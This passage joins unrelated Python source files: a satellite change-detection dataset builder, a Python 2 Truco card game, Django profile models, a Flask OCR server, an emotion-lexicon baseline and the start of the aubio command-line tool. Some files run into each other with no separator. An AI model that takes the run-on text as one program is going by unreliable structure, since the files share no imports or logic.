    if val in (1, 2, 3):
        return np.rot90(img, val)
    if val == 4:
        return np.flipud(img)
    if val == 5:
        return np.fliplr(img)
    raise KeyError(val)
# def createDataset_fromOnera(aug, cpt, crop_size, stride, channels, folders, dataset_dir, labels_dir):
# train_images = []
# train_labels = []
# if(aug==True): # select random crops and apply transformation
# for f in folders:
# raster1 = build_raster(dataset_dir + f + '/imgs_1_rect/', channels)
# raster2 = build_raster(dataset_dir + f + '/imgs_2_rect/', channels)
# raster = np.concatenate((raster1,raster2), axis=2)
# cm = gdal.Open(labels_dir + f + '/cm/' + f + '-cm.tif').ReadAsArray()
# cm = np.expand_dims(cm, axis=2)
# cm -= 1 # the change map has values 1 for no change and 2 for change ---> scale back to 0 and 1
# for i in range(cpt):
# x = random.randint(0,raster.shape[0]-crop_size)
# y = random.randint(0,raster.shape[1]-crop_size)
# img = trim(raster, x, y, crop_size)
# label = trim(cm, x, y, crop_size)
# n = random.randint(0,5)
# train_images.append(random_transform(img, n))
# train_labels.append(random_transform(label, n))
# else:
# for f in folders:
# raster1 = build_raster(dataset_dir + f + '/imgs_1_rect/')
# raster2 = build_raster(dataset_dir + f + '/imgs_2_rect/')
# raster = np.concatenate((raster1,raster2), axis=2)
# cm = gdal.Open(labels_dir + f + '/cm/' + f + '-cm.tif').ReadAsArray()
# cm = np.expand_dims(cm, axis=2)
# cm -= 1 # the change map has values 1 for no change and 2 for change ---> scale back to 0 and 1
# padded_raster = pad(raster, crop_size)
# train_images = train_images + crop(padded_raster, crop_size, stride)
# padded_cm = pad(cm, crop_size)
# train_labels = train_labels + crop(padded_cm, crop_size, stride)
# # Create inputs and labels for the Neural Network
# inputs = np.asarray(train_images, dtype='float32')
# labels = np.asarray(train_labels, dtype='float32')
# return inputs, labels
def createDataset_fromOnera(aug, cpt, crop_size, stride, channels, folders, dataset_dir, labels_dir):
    """Build (inputs, labels) training arrays from the Onera change-detection set.

    aug=True: draw `cpt` random crop_size crops per city; crops whose
    change-pixel ratio is >= 10% receive all six transforms (oversampling
    changed areas), the rest get one random transform.
    aug=False: tile each padded city raster exhaustively with stride `stride`.
    Returns float32 arrays with duplicate patches removed.
    """
    train_images = []
    train_labels = []
    if(aug==True): # select random crops and apply transformation
        for f in folders:
            raster1 = build_raster(dataset_dir + f + '/imgs_1_rect/', channels)
            raster2 = build_raster(dataset_dir + f + '/imgs_2_rect/', channels)
            raster = np.concatenate((raster1,raster2), axis=2)
            cm = gdal.Open(labels_dir + f + '/cm/' + f + '-cm.tif').ReadAsArray()
            cm = np.expand_dims(cm, axis=2)
            cm -= 1 # the change map has values 1 for no change and 2 for change ---> scale back to 0 and 1
            print('*** City %s started ***' %f)
            for i in range(cpt):
                x = random.randint(0,raster.shape[0]-crop_size)
                y = random.randint(0,raster.shape[1]-crop_size)
                label = trim(cm, x, y, crop_size)
                _, counts = np.unique(label, return_counts=True)
                img = trim(raster, x, y, crop_size)
                # Bug fix: the original condition
                #   float(len(counts)==1 or counts[1]/(np.sum(counts))) < 0.1
                # was mis-parenthesized, comparing a coerced boolean/ratio to 0.1.
                # Intended: patches that are all-unchanged or have under 10%
                # changed pixels get a single random transform; change-rich
                # patches are oversampled with all six transforms.
                change_ratio = 0.0 if len(counts) == 1 else counts[1] / float(np.sum(counts))
                if change_ratio < 0.1:
                    n = random.randint(0,5)
                    train_images.append(random_transform(img, n))
                    train_labels.append(random_transform(label, n))
                else:
                    for n in range(6):
                        train_images.append(random_transform(img, n))
                        train_labels.append(random_transform(label, n))
            print('*** City %s finished ***' %f)
    else:
        for f in folders:
            # Bug fix: the channels argument was missing here, which raised a
            # TypeError at runtime for the non-augmented path.
            raster1 = build_raster(dataset_dir + f + '/imgs_1_rect/', channels)
            raster2 = build_raster(dataset_dir + f + '/imgs_2_rect/', channels)
            raster = np.concatenate((raster1,raster2), axis=2)
            cm = gdal.Open(labels_dir + f + '/cm/' + f + '-cm.tif').ReadAsArray()
            cm = np.expand_dims(cm, axis=2)
            cm -= 1 # the change map has values 1 for no change and 2 for change ---> scale back to 0 and 1
            padded_raster = pad(raster, crop_size)
            train_images = train_images + crop(padded_raster, crop_size, stride)
            padded_cm = pad(cm, crop_size)
            train_labels = train_labels + crop(padded_cm, crop_size, stride)
    # Create inputs and labels for the Neural Network
    inputs = np.asarray(train_images, dtype='float32')
    labels = np.asarray(train_labels, dtype='float32')
    # Remove duplicate patches; return_index keeps labels aligned with inputs.
    inputs, indices = np.unique(inputs, axis=0, return_index=True)
    labels = labels[indices]
    return inputs, labels
def getBandNumbers(channels):
    """Map a channel count to the 1-based GDAL band indices of that band subset."""
    band_sets = {
        3: [2, 3, 4],                           # RGB
        4: [2, 3, 4, 8],                        # 10m resolution
        7: [1, 2, 3, 4, 8, 10, 11],             # 10m + 60m resolution
        10: [2, 3, 4, 5, 6, 7, 8, 9, 12, 13],   # 10m + 20m resolution
        13: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13],  # full raster
    }
    return band_sets[channels]
#-*- coding: utf-8 -*-
#!/usr/bin/env python
'''
Created on Jan 05, 2011
@author: Wander Jardim
'''
import os
import sys
def prepara_path():
    """Load the source directory onto sys.path.

    Only needed when running from a source distribution; binary
    distributions already guarantee the module path contains the modules.
    """
    # NOTE: Python 2 syntax below ("except NameError, e" / print statement).
    try:
        __file__
    except NameError, e:
        # __file__ is undefined (e.g. frozen/interactive run) — nothing to do.
        print e
    else:
        rel = lambda s: os.path.abspath(os.path.join(os.path.dirname(__file__), s))
        sys.path.insert(0, rel("lib.zip"))
        if os.path.exists("gamelib"):
            sys.path.insert(1, "gamelib")
prepara_path()  # extend sys.path before importing the bundled game libraries below
import logging
log = logging.getLogger('jogo')
log.debug("importado")
import cocos
from cocos.director import director
from cocos.actions import *
from cocos.scene import Scene
from pyglet.event import EventDispatcher
import pyglet
from hud import Hud
import game_audio
from bg_layer import BGLayer
from logicaTruco import *
class JogoT(cocos.layer.Layer):
    """Main Truco game layer: sets up the HUD, deals cards to four players
    (two teams) and places the first card sprites on screen. (Python 2 / cocos2d.)"""
    def __init__(self):
        super(JogoT, self).__init__()
        # Setting up layers
        # HUD
        self.hud = Hud(self)
        self.add(self.hud, z=-1)
        # NOTE(review): get_window_size() conventionally returns (width, height);
        # the names below look swapped — confirm before using these attributes.
        self.alturaTela, self.larguraTela = director.get_window_size()
        print "Altura: %s - Largura: %s" %(self.alturaTela, self.larguraTela)
        # Build and shuffle the deck, create players and assign them to two teams.
        baralho = Baralho()
        baralho.embaralhar()
        jogador1 = Jogador("Wander", 1)
        jogador2 = Jogador("Luana", 2)
        jogador3 = Jogador("Marluce", 1)
        jogador4 = Jogador("Ataide", 2)
        jogadoresGlobal = [jogador1, jogador2, jogador3, jogador4]
        mesa = Mesa(jogadoresGlobal, baralho)
        mesa.definirEquipes()
        mesa.definirOrdemJogadores()
        mesa.distrubuirCartas()
        # Show two of player 1's card sprites with different anchors (layout test).
        rectSprites = jogador1.mao[0].imagem.get_rect()
        Sprite1 = jogador1.mao[0].imagem
        Sprite1.position = 0,0
        Sprite1.image_anchor_x = 0
        Sprite1.image_anchor_y = 0
        Sprite2 = jogador1.mao[2].imagem
        Sprite2.position = 0,0
        Sprite2.image_anchor_x = -100
        Sprite2.image_anchor_y = -100
        self.add(Sprite1, z=1 )
        self.add(Sprite2, z=1 )
        print "Rect carta:"
        print rectSprites
        # Debug: dump the rect of every card in player 1's hand.
        pos = 325
        for carta in jogador1.mao:
            #carta.imagem.position = (12, 10)
            #carta.imagem.anchor_x = "top"
            #self.add(carta.imagem, z=1 )
            pos += 76
            rectSprites = carta.imagem.get_rect()
            print "Rect carta:"
            print "Largura: %s " % rectSprites.width
            print "Altura: %s" % rectSprites.height
        #cartaJogador1 = jogador1.jogarCarta(randrange(0, len(mesa.equipes[0].jogadores[0].mao)))
        #mesa.cartas.append(cartaJogador1)
        #self.remove(testeImg)
    def desenhaMesaJogo(self):
        """Placeholder: draw the game table (not implemented yet)."""
        pass
    def on_quit(self):
        # called by esc
        # NOTE(review): end() is called twice — presumably to pop two scenes; confirm intent.
        director.scene.end()
        director.scene.end()
def run():
    """Build and return the main game layer."""
    game_layer = JogoT()
    return game_layer
if __name__ == '__main__':
    # fixed 800x600 window; compose the scene from the background layer plus
    # the game layer, then hand control to the cocos director main loop
    director.init(width=800, height=600, do_not_scale=True)
    main_scene = Scene (BGLayer("mesa"), run())
    director.run(main_scene)
class Rectangle:
    """A rectangle positioned at (x, y) with the given width and height."""

    def __init__(self, x, y, width, height):
        self.x = x
        self.y = y
        self.width = width
        self.height = height

    def get_figure(self):
        """Return a printable summary of this rectangle's geometry."""
        return 'Rectangle({0}, {1}, {2}, {3}).'.format(
            self.x, self.y, self.width, self.height)
class Circle:
    """A circle centred at (x, y) with radius r."""

    def __init__(self, x, y, r):
        self.x = x
        self.y = y
        self.r = r

    def get_figure(self):
        """Return a printable summary of this circle's geometry."""
        return 'Circle({0}, {1}, {2}).'.format(self.x, self.y, self.r)
|
class A:
    """Root of the diamond; its __init__ reports construction."""
    def __init__(self):
        print("A")
class B(A):
    """Left branch of the diamond; inherits A.__init__ unchanged."""
    pass
class C(A):
    """Right branch of the diamond; inherits A.__init__ unchanged."""
    pass
class D(B, C):
    """Diamond tip: MRO is D -> B -> C -> A, so building D prints "A"."""
    pass
D()
#!/usr/bin/env python3
from aws_cdk import core
from test_cdk.test_cdk_stack import TestCdkStack
# Instantiate the CDK app, register the single stack, and emit the
# synthesized CloudFormation template (entry point for `cdk synth`).
app = core.App()
TestCdkStack(app, "test-cdk")
app.synth()
|
#%%
# -*- coding: utf-8 -*-
# Section 1
# Serial port of the motor-driver board (alternate port kept for reference).
COM = r'COM27'#r'COM21'
# Axis name passed to every MotorDriver call below.
motor = 'theta'
def degreesToSteps(degrees):
    """Convert an angle in degrees to motor steps (9,140,000 steps/revolution)."""
    steps_per_revolution = 9140000
    return int(steps_per_revolution * (degrees / 360))
from motor_driver_interface import MotorDriver
MD = MotorDriver(COM)  # open the serial link to the motor controller
#MD.alignMotor(motor)
#%%
# Section 2
# Jog the axis 1 degree clockwise.
MD.turnMotor(motor, degreesToSteps(1), 'cw')
#%%
# Section 3
# Jog the axis 3 degrees counter-clockwise.
MD.turnMotor(motor, degreesToSteps(3), 'ccw')
#%%
# Section 4
# Re-align the axis (presumably the controller's homing routine —
# confirm against the MotorDriver interface).
MD.alignMotor(motor)
import random
import numpy as np
from pandas import DataFrame
from sklearn.preprocessing import normalize
from math import acos, pi, isnan
from scipy.stats import entropy
np.random.seed(13)  # fixed NumPy seed for reproducibility
# six emotions are kept: anger, disgust, fear, joy, sadness, surprise
# (positive/negative/anticipation/trust are skipped in the lexicon loop below)
NUM_EMOTIONS = 6
NDIMS = 300  # dimensionality of each embedding vector in the .txt file
def read_emo_lemma(aline):
    """Parse one lexicon line into (lemma, emotion, flag).

    flag is 1 if lemma l has emotion e according to the lexicon,
    0 otherwise.
    """
    lemma, emotion, flag = aline.split()[:3]
    return lemma, emotion, int(flag)
def clip_to_range_0_1(v):
    """Clamp array *v* in place to (0, 1].

    Non-positive entries become 1e-15 and entries above 1 become 1.0,
    keeping probability vectors strictly positive for KL divergence.
    """
    too_low = v <= 0.
    too_high = v > 1.
    v[too_low] = 1e-15
    v[too_high] = 1.0
def kl_divergence(true, pred):
    """Return KL(true || pred) via scipy.stats.entropy.

    NOTE: clips BOTH argument arrays in place as a side effect, so the
    caller's vectors are modified.
    """
    clip_to_range_0_1(true)
    clip_to_range_0_1(pred)
    return entropy(true, pred)
def partition(items, n):
    """Split *items* round-robin into n sub-lists.

    The i-th sub-list receives elements i, i+n, i+2n, ...
    Fix: first parameter renamed from ``list``, which shadowed the builtin.
    """
    return [items[i::n] for i in range(n)]
# Map each embedding-file token to the line index of its first occurrence.
word2idx = {}
line_idx = 0
with open('resources/emotion_specific/bilstm_300d.txt', 'r', encoding='UTF-8') as f:
    next(f)  # skip header
    for line in f:
        values = line.split()
        # probably an error occurred during tokenization
        if len(values) != NDIMS + 1:
            continue
        word = values[0]
        # only one vector for each word
        try:
            word2idx[word]
        # NOTE(review): bare except — a KeyError is the only expected miss here
        except:
            word2idx[word] = line_idx
        line_idx += 1
def build_Y(lexicon, lemma2index, w2i, partition):
    """Build the baseline distribution and held-out gold labels for one fold.

    lexicon: {lexicon idx -> normalized emotion distribution (NUM_EMOTIONS,)}
    lemma2index: {lemma -> lexicon idx}
    w2i: {word -> embedding row idx}
    partition: collection of lexicon indices held out in this fold

    Returns (uniform baseline distribution, held-out embedding indices,
    y_test matrix of gold distributions, {embedding idx -> y_test row}).
    Rows of y_test beyond the last held-out lemma stay zero.
    """
    # candidate baselines; only the uniform one is returned below
    uniform_distr = np.asarray([1 / NUM_EMOTIONS] * NUM_EMOTIONS)
    majority_distr = np.asarray([0,0,0,1,0,0]) + 1e-12  # all mass on index 3 (joy)
    corpus_prior_distr = np.asarray([1555,761,2815,8240,3830,3849])  # corpus label counts
    corpus_prior_distr = corpus_prior_distr / np.sum(corpus_prior_distr)
    # stack the lexicon distributions into a dense (n_lemmas, NUM_EMOTIONS) array
    y_l = np.asarray(DataFrame(lexicon, dtype='float32').T.fillna(0), dtype='float32')
    # y = np.tile(corpus_prior_distr, (len(partition), 1))
    held_out_indices = []
    idx_translator = {}
    y_test = np.zeros((len(w2i), NUM_EMOTIONS))
    i = 0
    for word, idx in lemma2index.items():
        try:
            # if word in corpus
            idx_T = w2i[word] # get index of word in T
            if idx in partition:
                held_out_indices.append(idx_T)
                y_test[i] = y_l[idx]
                idx_translator[idx_T] = i
                i += 1
        except KeyError:
            continue
    # y = normalize(y, axis=1, norm='l1', copy=False) # turn multi-labels into prob distribution
    # y_test = normalize(y_test, axis=1, norm='l1', copy=False)
    return uniform_distr, held_out_indices, y_test, idx_translator
# Parse EmoLex: each lemma has one line per label; keep only the six emotions
# and L1-normalize, dropping lemmas that carry no emotion at all.
_lexicon = dict()
lexicon = dict()
lemma2index = dict()
with open('resources/data/emolex.txt', 'r') as f:
    emo_idx = 0 # anger: 0, anticipation: 1, disgust: 2, fear: 3, joy: 4, sadness: 5, surprise: 6, trust: 7
    i = 0
    for l in f:
        lemma, emotion, has_emotion = read_emo_lemma(l)
        if emotion == 'anger': # i.e. if lemma not in lexicon.keys()
            _lexicon[i] = np.empty(shape=(NUM_EMOTIONS,))
        if emotion in ['positive', 'negative', 'anticipation', 'trust']:
            # sentiment polarities and unused emotions: neither stored nor counted
            continue
        _lexicon[i][emo_idx] = has_emotion
        if emo_idx < NUM_EMOTIONS - 1:
            emo_idx += 1
        else:
            # reached the last of the six emotions for this lemma
            norm = np.sum(_lexicon[i])
            # keep only lemmas carrying at least one emotion
            if norm != 0:
                lemma2index[lemma] = i
                lexicon[i] = _lexicon[i] / norm
            i += 1
            # reset index - next line contains a new lemma
            emo_idx = 0
print(len(lemma2index))
# Evaluate the uniform baseline with 10-fold cross-validation over the
# lemmas that appear in both the lexicon and the embedding vocabulary.
intersection = [idx for lemma, idx in lemma2index.items() if lemma in word2idx.keys()]
indices = list(intersection)
random.shuffle(indices)
partitions = partition(indices, 10)
kls = []
for p in partitions:
    baseline, heldout, y_test, idx_translator = build_Y(lexicon, lemma2index, word2idx, p)
    divergences = []
    for i in heldout:
        i_ = idx_translator[i]
        divergences.append(kl_divergence(y_test[i_], baseline))
    # mean KL divergence of this fold
    kl = np.sum(np.asarray(divergences)) / len(divergences)
    kls.append(kl)
    print(kl)
# average over the 10 folds
result = np.sum(np.asarray(kls)) / len(kls)
print('Average kl:', result)
# remove 0 vectors from both y_test and the baseline
# Endpoint descriptors: each maps an XML API action path to the row
# attributes to extract (paths match the EVE Online XML API — confirm
# against the consumer of these dicts).
calendar_events_mapping = {
    'action': '/char/UpcomingCalendarEvents.xml.aspx',
    'fields': ['eventID', 'ownerName', 'eventDate', 'eventTitle', 'duration',
               'eventText']
}
# character-scope contracts and their line items
contracts_mapping = {
    'action': '/char/Contracts.xml.aspx',
    'fields': ['contractID', 'startStationID', 'status', 'price']
}
contract_items_mapping = {
    'action': '/char/ContractItems.xml.aspx',
    'fields': ['typeID', 'quantity', 'included']
}
# corporation-scope variants of the two mappings above
corp_contracts_mapping = {
    'action': '/corp/Contracts.xml.aspx',
    'fields': ['contractID', 'startStationID', 'type', 'status', 'price',
               'title']
}
corp_contract_items_mapping = {
    'action': '/corp/ContractItems.xml.aspx',
    'fields': ['typeID', 'quantity', 'included']
}
|
from django.db import models
from django.contrib.auth.models import User
from PIL import Image
# Choice tuples for model fields below: (stored value, human-readable label).
DEPARTMENTS = (
    ("CE", "Chemical Engineering"),
    ("BioTech", "Biotechnology"),
    ("Civil", "Civil Engineering"),
    ("CSE", "Computer Science and Engineering"),
    ("ECE", "Electronics and Communication Engineering"),
    ("EEE", "Electronics and Electrical Engineering"),
    ("EP", "Engineering Physics"),
    ("MnC", "Mathematics and Computing"),
    ("Mech", "Mechanical Engineering"),
    ("Design ", "Design "),
    ("BnB", "Biosciences and Bioengineering"),
    ("None", "None"),
)
# campus clubs/fests a profile can be associated with
CLUBS = (
    ("Alcher", "Alcheringa"),
    ("Cadence", "Cadence"),
    ("AnR", "Anchorenza and RadioG"),
    ("Fine Arts", "Fine Arts"),
    ("Montage", "Montage"),
    ("Lumiere", "Lumiere"),
    ("Octaves", "Octaves"),
    ("Expressions", "Expressions"),
    ("LitSoc-DebSoc", "LitSoc-DebSoc"),
    ("Aeromodelling", "Aeromodelling"),
    ("Astronomy", "Astronomy"),
    ("Coding", "Coding"),
    ("CnA", "Consulting and Analytics"),
    ("Electronics", "Electronics"),
    ("Prakriti", "Prakriti"),
    ("FnE", "Finance and Economics"),
    ("Robotics", "Robotics "),
    ("ACUMEN", "ACUMEN"),
    ("TechEvince", "TechEvince"),
    ("Green Automobile", "Green Automobile"),
    ("EDC", "Entrepreneurial Development Cell"),
    ("Udgam", "Udgam"),
    ("Techniche", "Techniche"),
    ("None", "None"),
)
# admission-year batches
BATCH = (
    ("2018", "2018"),
    ("2019", "2019"),
    ("2020", "2020"),
    ("2021", "2021"),
    ("2022", "2022"),
    ("2023", "2023"),
    ("2024", "2024"),
    ("None", "None"),
)
ADDRESS_TYPE = (
    ("H", "Home Address"),
    ("W", "Work/Office Address")
)
class Profile(models.Model):
    """Per-user profile (avatar plus campus affiliation), linked 1:1 to auth.User."""
    user = models.OneToOneField(User, related_name="profile", on_delete=models.CASCADE)
    # avatar image; shrunk in save() to keep uploads small
    image = models.ImageField(default='default.png', upload_to='profile_pics')
    is_merchant = models.BooleanField(default=False)
    department = models.CharField(max_length=120, choices=DEPARTMENTS, default='None')
    club = models.CharField(max_length=120, choices=CLUBS, default='None')
    batch = models.CharField(max_length=4, choices=BATCH, default='None')
    def __str__(self):
        return f'{self.user.username} Profile'
    def get_email(self):
        # convenience accessor for the linked user's e-mail address
        return f'{self.user.email}'
    def save(self, *args, **kwargs):
        """Persist the profile, then downscale oversized avatars in place."""
        super().save(*args, **kwargs)
        img = Image.open(self.image.path)
        if img.height > 300 or img.width > 300:
            # NOTE(review): (300, width*(height/300)) yields a float and an odd
            # aspect value; thumbnail() only treats it as a max bound, but
            # (300, 300) was probably intended — confirm.
            output_size = (300, img.width*(img.height/300))
            img.thumbnail(output_size)
            img.save(self.image.path)
class Address(models.Model):
    """A saved delivery/contact address; a user may keep several."""
    user = models.ForeignKey(User, related_name="addresses", on_delete=models.CASCADE)
    # NOTE(review): field name shadows the zip() builtin inside this class
    # body; harmless to Django, but renaming would require a migration.
    zip = models.CharField(max_length=10, blank=False, null=False)
    house_no = models.CharField(max_length=120, blank=False, null=False)
    area = models.CharField(max_length=120, blank=False, null=False)
    city = models.CharField(max_length=120, blank=False, null=False)
    state = models.CharField(max_length=120, blank=False, null=False)
    landmark = models.CharField(max_length=120, blank=True, null=True)
    # recipient name and phone numbers for this address
    name = models.CharField(max_length=120, blank=False, null=False)
    mobile_no = models.CharField(max_length=10, blank=False, null=False)
    alternate_no = models.CharField(max_length=10, blank=True, null=True)
    address_type = models.CharField(max_length=120, choices=ADDRESS_TYPE, default='H')
    def __str__(self):
        return str(self.user.username)
    # def get_fulladdress(self):
|
# -*- coding: utf-8 -*-
# USAGE
# Start the server:
# python app.py
# Submit a request via cURL:
# curl --data input_word="good" http://localhost:5000/predict
# curl --data input_word="am" http://localhost:5000/predict
# curl --data input_word="bad" http://localhost:5000/predict
# import the necessary packages
import numpy as np
import flask
import io
import tensorflow as tf
import os
import itertools
import codecs
import re
import json
import datetime
import cairocffi as cairo
import editdistance
import numpy as np
from scipy import ndimage
from keras import backend as K
from keras.layers.convolutional import Conv2D, MaxPooling2D
from keras.layers import Input, Dense, Activation
from keras.layers import Reshape, Lambda
from keras.layers.merge import add, concatenate
from keras.models import Model
from keras.layers.recurrent import GRU
from keras.optimizers import SGD
from keras.utils.data_utils import get_file
from keras.preprocessing import image
import keras.callbacks
import argparse
from src.TextImageGenerator import TextImageGenerator
from src.utils import *
# CLI: --weight_path points at the trained CTC model weights to serve.
parser = argparse.ArgumentParser("bnp_app")
parser.add_argument("--weight_path", type=str, default="./model/weights24.h5", help="path for the model weight")
args = parser.parse_args()
# initialize our Flask application and the Keras model
app = flask.Flask(__name__)
model = None
np.random.seed(55)  # deterministic behaviour of the text renderer/generator
def build_model(weight_path):
    """Rebuild the CTC OCR network, load trained weights from *weight_path*,
    and return (prediction model, TF default graph).

    The full training-time model (with the CTC loss lambda layer) is
    assembled only so the saved weights can be loaded; the returned model
    maps an input image straight to per-timestep softmax activations.
    """
    img_w = 128
    # Input Parameters
    img_h = 64
    words_per_epoch = 16000
    val_split = 0.2
    val_words = int(words_per_epoch * (val_split))
    # Network parameters
    conv_filters = 16
    kernel_size = (3, 3)
    pool_size = 2
    time_dense_size = 32
    rnn_size = 512
    minibatch_size = 32
    if K.image_data_format() == 'channels_first':
        input_shape = (1, img_w, img_h)
    else:
        input_shape = (img_w, img_h, 1)
    # the word lists are only needed so the generator can size the alphabet
    fdir = os.path.dirname(get_file('wordlists.tgz',
                                    origin='http://www.mythic-ai.com/datasets/wordlists.tgz', untar=True))
    img_gen = TextImageGenerator(monogram_file=os.path.join(fdir, 'wordlist_mono_clean.txt'),
                                 bigram_file=os.path.join(fdir, 'wordlist_bi_clean.txt'),
                                 minibatch_size=minibatch_size,
                                 img_w=img_w,
                                 img_h=img_h,
                                 downsample_factor=(pool_size ** 2),
                                 val_split=words_per_epoch - val_words
                                 )
    act = 'relu'
    # two conv/pool stages, then reshape to a (time, features) sequence
    input_data = Input(name='the_input', shape=input_shape, dtype='float32')
    inner = Conv2D(conv_filters, kernel_size, padding='same',
                   activation=act, kernel_initializer='he_normal',
                   name='conv1')(input_data)
    inner = MaxPooling2D(pool_size=(pool_size, pool_size), name='max1')(inner)
    inner = Conv2D(conv_filters, kernel_size, padding='same',
                   activation=act, kernel_initializer='he_normal',
                   name='conv2')(inner)
    inner = MaxPooling2D(pool_size=(pool_size, pool_size), name='max2')(inner)
    conv_to_rnn_dims = (img_w // (pool_size ** 2), (img_h // (pool_size ** 2)) * conv_filters)
    inner = Reshape(target_shape=conv_to_rnn_dims, name='reshape')(inner)
    # cuts down input size going into RNN:
    inner = Dense(time_dense_size, activation=act, name='dense1')(inner)
    # Two layers of bidirectional GRUs
    # GRU seems to work as well, if not better than LSTM:
    gru_1 = GRU(rnn_size, return_sequences=True, kernel_initializer='he_normal', name='gru1')(inner)
    gru_1b = GRU(rnn_size, return_sequences=True, go_backwards=True, kernel_initializer='he_normal', name='gru1_b')(inner)
    gru1_merged = add([gru_1, gru_1b])
    gru_2 = GRU(rnn_size, return_sequences=True, kernel_initializer='he_normal', name='gru2')(gru1_merged)
    gru_2b = GRU(rnn_size, return_sequences=True, go_backwards=True, kernel_initializer='he_normal', name='gru2_b')(gru1_merged)
    # transforms RNN output to character activations:
    inner = Dense(img_gen.get_output_size(), kernel_initializer='he_normal',
                  name='dense2')(concatenate([gru_2, gru_2b]))
    y_pred = Activation('softmax', name='softmax')(inner)
    Model(inputs=input_data, outputs=y_pred).summary()
    labels = Input(name='the_labels', shape=[img_gen.absolute_max_string_len], dtype='float32')
    input_length = Input(name='input_length', shape=[1], dtype='int64')
    label_length = Input(name='label_length', shape=[1], dtype='int64')
    # Keras doesn't currently support loss funcs with extra parameters
    # so CTC loss is implemented in a lambda layer
    loss_out = Lambda(ctc_lambda_func, output_shape=(1,), name='ctc')([y_pred, labels, input_length, label_length])
    # clipnorm seems to speeds up convergence
    sgd = SGD(lr=0.02, decay=1e-6, momentum=0.9, nesterov=True, clipnorm=5)
    model = Model(inputs=[input_data, labels, input_length, label_length], outputs=loss_out)
    # the loss calc occurs elsewhere, so use a dummy lambda func for the loss
    model.compile(loss={'ctc': lambda y_true, y_pred: y_pred}, optimizer=sgd)
    model.load_weights(weight_path)
    # captures output of softmax so we can decode the output during visualization
    #test_func = K.function([input_data], [y_pred])
    #global model_p
    model_p = Model(inputs=input_data, outputs=y_pred)
    #global graph
    graph = tf.get_default_graph()
    return model_p, graph
def decode_predict_ctc(out, top_paths = 1):
    """Decode a softmax output tensor into the *top_paths* most likely
    strings via CTC beam search (beam width at least 5)."""
    decoded_texts = []
    beam_width = max(5, top_paths)
    for path_idx in range(top_paths):
        seq = K.get_value(
            K.ctc_decode(out, input_length=np.ones(out.shape[0]) * out.shape[1],
                         greedy=False, beam_width=beam_width,
                         top_paths=top_paths)[0][path_idx])[0]
        decoded_texts.append(labels_to_text(seq))
    return decoded_texts
def predict_a_image(model, a, top_paths = 1):
    """Predict the text contained in image array *a*.

    a: 2-D image array; transposed and given a batch axis before predict.
    top_paths: number of candidate decodings to return (best first).
    Returns a list of decoded strings.

    Fix: parameter renamed from the misspelled ``mdoel``.
    """
    c = np.expand_dims(a.T, axis=0)
    net_out_value = model.predict(c)
    top_pred_texts = decode_predict_ctc(net_out_value, top_paths)
    return top_pred_texts
# Build the model once at import time; keep the TF graph so request handler
# threads can run predictions against it.
model_p, graph = build_model(args.weight_path)
@app.route("/predict", methods=["POST"])
def predict():
    """Render the POSTed `input_word` to a synthetic image, run the CTC
    model on it, and return the decoded texts as JSON."""
    # initialize the data dictionary that will be returned from the
    # view
    data = {}
    if flask.request.method == "POST":
        if flask.request.get_data():
            input_word = flask.request.form.get('input_word', '')
            # fixed canvas matching the network's input size
            h = 64
            w = 128
            a = paint_text(input_word,h = h, w = w)
            # NOTE(review): `b` is unused — looks like a debugging leftover
            b = a.reshape((h, w))
            c = np.expand_dims(a.T, axis=0)
            # predictions must run inside the graph built at import time
            with graph.as_default():
                net_out_value = model_p.predict(c)
                pred_texts = decode_predict_ctc(net_out_value)
                top_3_paths = predict_a_image(model_p, a, top_paths = 3)
            data["pred_texts"] = pred_texts
            data["top_3_paths"] = top_3_paths
    # return the data dictionary as a JSON response
    return flask.jsonify(data)
# if this is the main thread of execution first load the model and
# then start the server
if __name__ == "__main__":
    print(("* Loading Keras model and Flask starting server..."
        "please wait until server has fully started"))
    # listen on all interfaces (default Flask port 5000)
    app.run(host='0.0.0.0')
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""aubio command line tool
This file was written by Paul Brossier <piem@aubio.org> and is released under
the GNU/GPL v3.
Note: this script is mostly about parsing command line arguments. For more
readable code examples, check out the `python/demos` folder."""
import sys
import argparse
import aubio
def aubio_parser():
    """Build the top-level argument parser with one sub-parser per command."""
    epilog = 'use "%(prog)s <command> --help" for more info about each command'
    parser = argparse.ArgumentParser(epilog=epilog)
    parser.add_argument('-V', '--version', help="show version",
            action="store_true", dest="show_version")
    # every subcommand parser is an AubioArgumentParser, which provides the
    # add_* helpers used by the parser_add_subcommand_* functions below
    subparsers = parser.add_subparsers(title='commands', dest='command',
            parser_class= AubioArgumentParser,
            metavar="")
    parser_add_subcommand_help(subparsers)
    parser_add_subcommand_onset(subparsers)
    parser_add_subcommand_pitch(subparsers)
    parser_add_subcommand_beat(subparsers)
    parser_add_subcommand_tempo(subparsers)
    parser_add_subcommand_notes(subparsers)
    parser_add_subcommand_mfcc(subparsers)
    parser_add_subcommand_melbands(subparsers)
    parser_add_subcommand_quiet(subparsers)
    parser_add_subcommand_cut(subparsers)
    return parser
def parser_add_subcommand_help(subparsers):
    """Register the global 'help' subcommand."""
    subparsers.add_parser(
        'help',
        help='show help message',
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
def parser_add_subcommand_onset(subparsers):
    """Register the 'onset' subcommand and its options."""
    sub = subparsers.add_parser(
        'onset',
        help='estimate time of onsets (beginning of sound event)',
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    sub.add_input()
    sub.add_buf_hop_size()
    method_help = "onset novelty function"
    method_help += " <default|energy|hfc|complex|phase|specdiff|kl|mkl|specflux>"
    sub.add_method(helpstr=method_help)
    sub.add_threshold()
    sub.add_silence()
    sub.add_minioi()
    sub.add_time_format()
    sub.add_verbose_help()
    sub.set_defaults(process=process_onset)
def parser_add_subcommand_pitch(subparsers):
    """Register the 'pitch' subcommand and its options."""
    sub = subparsers.add_parser(
        'pitch', help='estimate fundamental frequency (monophonic)')
    sub.add_input()
    sub.add_buf_hop_size(buf_size=2048)
    method_help = "pitch detection method <default|yinfft|yin|mcomb|fcomb|schmitt>"
    sub.add_method(helpstr=method_help)
    sub.add_threshold()
    sub.add_pitch_unit()
    sub.add_silence()
    sub.add_time_format()
    sub.add_verbose_help()
    sub.set_defaults(process=process_pitch)
def parser_add_subcommand_beat(subparsers):
    """Register the 'beat' subcommand and its options."""
    sub = subparsers.add_parser('beat', help='estimate location of beats')
    sub.add_input()
    sub.add_buf_hop_size(buf_size=1024, hop_size=512)
    sub.add_time_format()
    sub.add_verbose_help()
    sub.set_defaults(process=process_beat)
